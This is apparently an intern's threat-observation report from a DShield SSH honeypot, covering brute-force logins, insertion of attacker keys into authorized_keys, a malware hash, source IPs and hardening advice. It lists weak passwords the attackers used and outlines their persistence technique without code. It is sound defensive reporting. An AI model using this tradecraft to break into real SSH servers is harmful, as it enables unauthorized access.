Attack Observation Report

Time and Date of Activity

Start: 2024-07-29 - End: 2024-07-30

Data Source and Methodology

The data analyzed in this report comes from a SANS Internet Storm Center DShield honeypot, which I've set up as part of my internship program. This honeypot is specifically designed to capture and log malicious attempts to breach systems by simulating vulnerable services. Over a 48-hour period, the honeypot recorded detailed logs of various attack attempts, particularly those targeting SSH services. The observations and analyses presented here are based on these logs, processed through the command line and enriched using Cowrie Processor [1]. This setup allows for the monitoring of real-world attack patterns and provides invaluable insights into the tactics used by threat actors.

Executive Summary of the Activity

Over two days, the honeypot was subjected to SSH-based attacks, primarily to establish persistent unauthorized access. The attackers utilized common credentials to gain access and employed tactics to modify SSH configurations for persistence. Malicious payloads identified as trojan.shell/malkey were frequently downloaded and executed, indicating a widespread and automated attack campaign.

IP Involved Account Information

Notable IPs:
- 161.35.71.130 (DigitalOcean, US)
- 47.76.43.171 (Alibaba, CN)
- 43.156.239.137 (Tencent, CN)
- 218.92.0.60 (Chinanet, CN)

Relevant Activity Summary

The attacks primarily targeted SSH services, with most sessions involving the root user. Attackers used a variety of common passwords, such as abc@12345678, Qwe@1234, and Lz@123456. Upon successful login, the attackers modified the .ssh/authorized_keys file to insert their SSH keys, enabling future access without re-authentication.

Correlated Activity Over Time

Common Attack Duration: Attacks typically last between 3 to 20 seconds.
Command Count: Most sessions executed 3 commands, with some more sophisticated sessions executing up to 19.
Payloads: The Threat Actor consistently downloaded a file identified as trojan.shell/malkey to create persistent SSH access.

Malware Analysis

Payload Name: trojan.shell/malkey
Hash: a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 [2]
Description: The payload modifies SSH key configurations to establish unauthorized access. This malware has been identified in multiple sessions and is classified as a trojan.
First Submission: 2018-07-05
VT Hits: 25 detections as malicious.

Vulnerability Exploitation

Exploit: The attacks primarily exploited weak SSH credentials and misconfigured SSH services.
CVE: N/A (Weakness in SSH configuration rather than a specific vulnerability)
MITRE ATT&CK:
- T1078.003 [3]: Valid Accounts: SSH
- T1570 [4]: Lateral Tool Transfer
- T1059 [5]: Command and Scripting Interpreter: SSH

Goal of the Attack

The threat actor's primary goal was to establish persistent access to the honeypot through SSH by modifying authentication mechanisms and securing unauthorized entry points for future exploitation.

Potential Success of the Attack

Given the tactics observed, the attack would likely succeed if the honeypot or any similar system were vulnerable to weak SSH credentials. Modifying .ssh/authorized_keys ensures attackers can regain access at any time.

System Protection Recommendations

Enforce Strong Authentication [6]: Utilize strong, complex passwords and consider implementing multi-factor authentication (MFA) for SSH access.
SSH Configuration [7]: Regularly audit and configure SSH to disallow root login and restrict access to authorized IPs only.
Monitor SSH Logs [7]: Monitor SSH logs for unusual activity, especially repeated login attempts and unauthorized changes to .ssh/authorized_keys.

Attacker Information

Sources: Attackers use infrastructure from well-known cloud providers such as DigitalOcean, Alibaba, and Tencent.
Threat Intel: IPs associated with this activity have been flagged in previous incidents related to automated SSH brute-force attacks.

Indicators

IP List:
- 161.35.71.130 (DigitalOcean, US)
- 43.156.239.137 (Tencent, CN)
- 47.76.43.171 (Alibaba, CN)
- 218.92.0.60 (Chinanet, CN)
Hashes:
- a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 (trojan.shell/malkey)